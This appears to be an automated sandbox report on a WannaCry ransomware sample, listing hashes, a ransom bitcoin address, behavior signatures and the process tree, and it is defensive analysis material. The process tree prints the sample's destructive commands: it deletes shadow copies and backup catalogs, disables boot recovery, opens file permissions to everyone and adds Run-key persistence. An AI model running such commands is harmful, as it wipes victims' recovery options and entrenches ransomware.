Analysis
-
max time kernel
152s -
max time network
150s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
18-09-2020 00:15
Static task
static1
Behavioral task
behavioral1
Sample
32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Resource
win10v200722
General
-
Target
32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
-
Size
3.6MB
-
MD5
d5dcd28612f4d6ffca0cfeaefd606bcf
-
SHA1
cf60fa60d2f461dddfdfcebf16368e6b539cd9ba
-
SHA256
32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf
-
SHA512
dbfcf464c3211b7454c406a9f9532c416910ac24ea862d7061e3503f294d690b4957020dcc703984449e0934c7a595cf9061412fa25383850dd86235648ac23b
Malware Config
Extracted
C:\ProgramData\mpvxsxzo192\@Please_Read_Me@.txt
wannacry
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 20 IoCs
Processes:
tasksche.exetasksche.exetaskdl.exe@WanaDecryptor@.exe@WanaDecryptor@.exetaskhsvc.exetaskse.exetaskdl.exe@WanaDecryptor@.exetaskse.exetaskdl.exe@WanaDecryptor@.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetasksche.exetasksche.exepid process 1880 tasksche.exe 1604 tasksche.exe 836 taskdl.exe 860 @WanaDecryptor@.exe 2028 @WanaDecryptor@.exe 1476 taskhsvc.exe 1340 taskse.exe 2024 taskdl.exe 1504 @WanaDecryptor@.exe 1996 taskse.exe 808 taskdl.exe 800 @WanaDecryptor@.exe 1356 taskse.exe 316 @WanaDecryptor@.exe 1848 taskdl.exe 2276 taskse.exe 2304 @WanaDecryptor@.exe 2324 taskdl.exe 2408 tasksche.exe 2444 tasksche.exe -
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
tasksche.exedescription ioc process File created C:\Users\Admin\Pictures\SetDeny.raw.WNCRYT tasksche.exe File renamed C:\Users\Admin\Pictures\SetDeny.raw.WNCRYT => C:\Users\Admin\Pictures\SetDeny.raw.WNCRY tasksche.exe File opened for modification C:\Users\Admin\Pictures\SetDeny.raw.WNCRY tasksche.exe -
Drops startup file 2 IoCs
Processes:
tasksche.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD6A58.tmp tasksche.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6A06.tmp tasksche.exe -
Loads dropped DLL 27 IoCs
Processes:
tasksche.execscript.execmd.exe@WanaDecryptor@.exetaskhsvc.exetaskse.exetaskse.exetaskse.exetaskse.exepid process 1604 tasksche.exe 1604 tasksche.exe 1836 cscript.exe 1604 tasksche.exe 1604 tasksche.exe 2024 cmd.exe 860 @WanaDecryptor@.exe 860 @WanaDecryptor@.exe 1476 taskhsvc.exe 1476 taskhsvc.exe 1476 taskhsvc.exe 1476 taskhsvc.exe 1476 taskhsvc.exe 1476 taskhsvc.exe 1604 tasksche.exe 1604 tasksche.exe 1604 tasksche.exe 1340 taskse.exe 1604 tasksche.exe 1604 tasksche.exe 1996 taskse.exe 1604 tasksche.exe 1356 taskse.exe 1604 tasksche.exe 1604 tasksche.exe 2276 taskse.exe 1604 tasksche.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exeicacls.exepid process 2480 icacls.exe 1928 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mpvxsxzo192 = "\"C:\\ProgramData\\mpvxsxzo192\\tasksche.exe\"" reg.exe -
JavaScript code in executable 7 IoCs
Processes:
resource yara_rule \ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe js \ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe js C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe js C:\ProgramData\mpvxsxzo192\TaskData\Tor\LIBEAY32.dll js \ProgramData\mpvxsxzo192\TaskData\Tor\libeay32.dll js C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe js C:\ProgramData\mpvxsxzo192\TaskData\Tor\tor.exe js -
Drops file in System32 directory 8 IoCs
Processes:
taskhsvc.exemssecsvc.exe32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp taskhsvc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp taskhsvc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp taskhsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new taskhsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\lock taskhsvc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\state.tmp taskhsvc.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
@WanaDecryptor@.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" @WanaDecryptor@.exe -
Drops file in Windows directory 2 IoCs
Processes:
32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exemssecsvc.exedescription ioc process File created C:\WINDOWS\tasksche.exe 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe File created C:\WINDOWS\tasksche.exe mssecsvc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 808 vssadmin.exe -
Modifies data under HKEY_USERS 48 IoCs
Processes:
mssecsvc.exe32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.execscript.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDetectedUrl mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\WpadDecisionTime = 80165021618dd601 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\32-e2-17-db-d2-77 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software cscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings cscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a0700b4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\32-e2-17-db-d2-77 mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\WpadDecisionReason = "1" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\WpadDecision = "0" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a0700b4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mssecsvc.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mssecsvc.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3} 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\WpadNetworkName = "Network" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings cscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" mssecsvc.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = 80165021618dd601 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft cscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host cscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mssecsvc.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = 80165021618dd601 mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" mssecsvc.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
Processes:
tasksche.exetasksche.exepid process 1604 tasksche.exe 2444 tasksche.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
taskhsvc.exepid process 1476 taskhsvc.exe 1476 taskhsvc.exe 1476 taskhsvc.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
Processes:
taskse.exevssvc.exeWMIC.exetaskse.exetaskse.exetaskse.exedescription pid process Token: SeTcbPrivilege 1340 taskse.exe Token: SeTcbPrivilege 1340 taskse.exe Token: SeBackupPrivilege 1816 vssvc.exe Token: SeRestorePrivilege 1816 vssvc.exe Token: SeAuditPrivilege 1816 vssvc.exe Token: SeAssignPrimaryTokenPrivilege 556 WMIC.exe Token: SeIncreaseQuotaPrivilege 556 WMIC.exe Token: SeSecurityPrivilege 556 WMIC.exe Token: SeTakeOwnershipPrivilege 556 WMIC.exe Token: SeLoadDriverPrivilege 556 WMIC.exe Token: SeSystemtimePrivilege 556 WMIC.exe Token: SeBackupPrivilege 556 WMIC.exe Token: SeRestorePrivilege 556 WMIC.exe Token: SeShutdownPrivilege 556 WMIC.exe Token: SeSystemEnvironmentPrivilege 556 WMIC.exe Token: SeUndockPrivilege 556 WMIC.exe Token: SeManageVolumePrivilege 556 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 556 WMIC.exe Token: SeIncreaseQuotaPrivilege 556 WMIC.exe Token: SeSecurityPrivilege 556 WMIC.exe Token: SeTakeOwnershipPrivilege 556 WMIC.exe Token: SeLoadDriverPrivilege 556 WMIC.exe Token: SeSystemtimePrivilege 556 WMIC.exe Token: SeBackupPrivilege 556 WMIC.exe Token: SeRestorePrivilege 556 WMIC.exe Token: SeShutdownPrivilege 556 WMIC.exe Token: SeSystemEnvironmentPrivilege 556 WMIC.exe Token: SeUndockPrivilege 556 WMIC.exe Token: SeManageVolumePrivilege 556 WMIC.exe Token: SeTcbPrivilege 1996 taskse.exe Token: SeTcbPrivilege 1996 taskse.exe Token: SeTcbPrivilege 1356 taskse.exe Token: SeTcbPrivilege 1356 taskse.exe Token: SeTcbPrivilege 2276 taskse.exe Token: SeTcbPrivilege 2276 taskse.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exepid process 860 @WanaDecryptor@.exe 2028 @WanaDecryptor@.exe 2028 @WanaDecryptor@.exe 860 @WanaDecryptor@.exe 1504 @WanaDecryptor@.exe 1504 @WanaDecryptor@.exe 800 @WanaDecryptor@.exe 316 @WanaDecryptor@.exe 2304 @WanaDecryptor@.exe -
Suspicious use of WriteProcessMemory 128 IoCs
Processes:
32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.execmd.exetasksche.execmd.execmd.exe@WanaDecryptor@.execmd.exe@WanaDecryptor@.exedescription pid process target process PID 1420 wrote to memory of 1880 1420 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe tasksche.exe PID 1420 wrote to memory of 1880 1420 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe tasksche.exe PID 1420 wrote to memory of 1880 1420 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe tasksche.exe PID 1420 wrote to memory of 1880 1420 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe tasksche.exe PID 1740 wrote to memory of 1604 1740 cmd.exe tasksche.exe PID 1740 wrote to memory of 1604 1740 cmd.exe tasksche.exe PID 1740 wrote to memory of 1604 1740 cmd.exe tasksche.exe PID 1740 wrote to memory of 1604 1740 cmd.exe tasksche.exe PID 1604 wrote to memory of 1668 1604 tasksche.exe attrib.exe PID 1604 wrote to memory of 1668 1604 tasksche.exe attrib.exe PID 1604 wrote to memory of 1668 1604 tasksche.exe attrib.exe PID 1604 wrote to memory of 1668 1604 tasksche.exe attrib.exe PID 1604 wrote to memory of 1928 1604 tasksche.exe icacls.exe PID 1604 wrote to memory of 1928 1604 tasksche.exe icacls.exe PID 1604 wrote to memory of 1928 1604 tasksche.exe icacls.exe PID 1604 wrote to memory of 1928 1604 tasksche.exe icacls.exe PID 1604 wrote to memory of 836 1604 tasksche.exe taskdl.exe PID 1604 wrote to memory of 836 1604 tasksche.exe taskdl.exe PID 1604 wrote to memory of 836 1604 tasksche.exe taskdl.exe PID 1604 wrote to memory of 836 1604 tasksche.exe taskdl.exe PID 1604 wrote to memory of 308 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 308 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 308 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 308 1604 tasksche.exe cmd.exe PID 308 wrote to memory of 1836 308 cmd.exe cscript.exe PID 308 wrote to memory of 1836 308 cmd.exe cscript.exe PID 308 wrote to memory of 1836 308 cmd.exe cscript.exe PID 308 wrote to memory of 1836 308 cmd.exe cscript.exe PID 1604 wrote to memory of 860 1604 tasksche.exe @WanaDecryptor@.exe PID 1604 wrote to memory of 860 1604 tasksche.exe @WanaDecryptor@.exe PID 1604 wrote to memory of 860 1604 tasksche.exe @WanaDecryptor@.exe PID 1604 wrote to memory of 860 1604 tasksche.exe @WanaDecryptor@.exe PID 1604 wrote to memory of 2024 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 2024 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 2024 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 2024 1604 tasksche.exe cmd.exe PID 2024 wrote to memory of 2028 2024 cmd.exe @WanaDecryptor@.exe PID 2024 wrote to memory of 2028 2024 cmd.exe @WanaDecryptor@.exe PID 2024 wrote to memory of 2028 2024 cmd.exe @WanaDecryptor@.exe PID 2024 wrote to memory of 2028 2024 cmd.exe @WanaDecryptor@.exe PID 860 wrote to memory of 1476 860 @WanaDecryptor@.exe taskhsvc.exe PID 860 wrote to memory of 1476 860 @WanaDecryptor@.exe taskhsvc.exe PID 860 wrote to memory of 1476 860 @WanaDecryptor@.exe taskhsvc.exe PID 860 wrote to memory of 1476 860 @WanaDecryptor@.exe taskhsvc.exe PID 1604 wrote to memory of 1340 1604 tasksche.exe taskse.exe PID 1604 wrote to memory of 1340 1604 tasksche.exe taskse.exe PID 1604 wrote to memory of 1340 1604 tasksche.exe taskse.exe PID 1604 wrote to memory of 1340 1604 tasksche.exe taskse.exe PID 1604 wrote to memory of 948 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 948 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 948 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 948 1604 tasksche.exe cmd.exe PID 1604 wrote to memory of 2024 1604 tasksche.exe taskdl.exe PID 1604 wrote to memory of 2024 1604 tasksche.exe taskdl.exe PID 1604 wrote to memory of 2024 1604 tasksche.exe taskdl.exe PID 1604 wrote to memory of 2024 1604 tasksche.exe taskdl.exe PID 948 wrote to memory of 1060 948 cmd.exe reg.exe PID 948 wrote to memory of 1060 948 cmd.exe reg.exe PID 948 wrote to memory of 1060 948 cmd.exe reg.exe PID 948 wrote to memory of 1060 948 cmd.exe reg.exe PID 2028 wrote to memory of 1928 2028 @WanaDecryptor@.exe cmd.exe PID 2028 wrote to memory of 1928 2028 @WanaDecryptor@.exe cmd.exe PID 2028 wrote to memory of 1928 2028 @WanaDecryptor@.exe cmd.exe PID 2028 wrote to memory of 1928 2028 @WanaDecryptor@.exe cmd.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 1668 attrib.exe 2460 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe"C:\Users\Admin\AppData\Local\Temp\32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\tasksche.exeC:\WINDOWS\tasksche.exe /i2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exeC:\Users\Admin\AppData\Local\Temp\32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe -m security1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\mpvxsxzo192\tasksche.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\mpvxsxzo192\tasksche.exeC:\ProgramData\mpvxsxzo192\tasksche.exe2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h .3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\ProgramData\mpvxsxzo192\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c 175431600395137.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs4⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe@WanaDecryptor@.exe co3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @WanaDecryptor@.exe vs3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe@WanaDecryptor@.exe vs4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet5⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\mpvxsxzo192\taskse.exetaskse.exe C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"4⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mpvxsxzo192" /t REG_SZ /d "\"C:\ProgramData\mpvxsxzo192\tasksche.exe\"" /f3⤵
